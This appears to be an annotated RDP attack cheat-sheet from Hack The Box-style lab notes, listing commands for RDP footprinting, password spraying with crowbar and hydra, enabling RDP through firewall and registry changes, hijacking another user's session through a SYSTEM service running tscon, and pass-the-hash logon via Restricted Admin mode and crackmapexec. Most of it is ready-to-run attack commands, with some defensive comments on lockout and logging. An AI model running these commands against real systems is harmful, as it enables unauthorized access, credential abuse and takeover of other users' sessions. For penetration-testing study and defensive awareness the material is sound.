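# RDP (3389/tcp) cheat-sheet. Lines with the "Intrusionz3r0X@htb[/htb]$" / "#" prompt run on the
# Linux attack box; "C:\htb>" / "c:\>" lines run in a Windows command shell on the target.
#we can connect to RDP servers on Linux using xfreerdp, rdesktop, or Remmina
#Footprinting
# 'rdp*' is quoted so bash passes the pattern to nmap instead of globbing it against the
# working directory (after the `cd rdp-sec-check` below an unquoted rdp* would match local files).
Intrusionz3r0X@htb[/htb]$ nmap -sV -sC 10.129.201.248 -p3389 --script 'rdp*'
# RDP Security Check: probes which RDP security protocols / encryption levels the server accepts
# (useful on the defending side too, to confirm NLA/TLS is enforced).
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
Intrusionz3r0X@htb[/htb]$ rdp-sec-check.pl 10.0.0.94
#Bruteforce
# Both lines below are a password spray (one password, many users). Defensively this is exactly what an
# account-lockout threshold and failed-logon auditing on the RDP host are meant to catch.
Intrusionz3r0X@htb[/htb]$ crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
Intrusionz3r0X@htb[/htb]# hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
#Enable RDP
# Inbound allow rule for 3389 plus clearing fDenyTSConnections (0 = connections allowed; /f skips the
# overwrite prompt). The outbound rule is usually redundant since Windows allows outbound by default.
c:\> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow
c:\> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=out localport=3389 action=allow
c:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#---------Session Hijacking--------
#(This method no longer works on Server 2019.)
# query user lists sessions; ">" marks the session we are currently in (juurena, rdp-tcp#13, ID 1).
C:\htb> query user
# USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
#>juurena rdp-tcp#13 1 Active 7 8/25/2021 1:23 AM
# lewen rdp-tcp#14 2 Active * 8/25/2021 1:28 AM
# tscon <session id> /dest:<our session name> attaches lewen's session (ID 2) to rdp-tcp#13. tscon needs
# SYSTEM, which is why it is wrapped in a service (services run as LocalSystem). Service installation is
# written to the System event log, so this leaves a clear artefact for responders.
C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
#[SC] CreateService SUCCESS
C:\htb> net start sessionhijack
#-------------------------------------
# Initiate an RDP Session
# Passwords with shell-special characters are safer in single quotes when typed interactively.
# (A second copy of the rdp-sec-check `git clone` line had been pasted onto the end of this command in
# the original notes; it is already listed above and was removed here.)
Intrusionz3r0X@htb[/htb]$ xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248
#RDP Pass-the-Hash (PtH)
# DisableRestrictedAdmin = 0 turns Restricted Admin mode ON (1 = off); that mode is the prerequisite for
# an NT-hash RDP logon. Watch for this value changing on hosts where it was not deliberately enabled.
C:\htb> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
#Enable RDP via Crackmap exec
# Authenticates over SMB with the NT hash (-H) and, via the rdp module, presumably flips the same
# fDenyTSConnections setting remotely — requires local admin on 10.10.10.40.
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.10.40 -u "Administrator" -H 'cdf51b162460b7d5bc898f493751a0cc' -M rdp -o action=enable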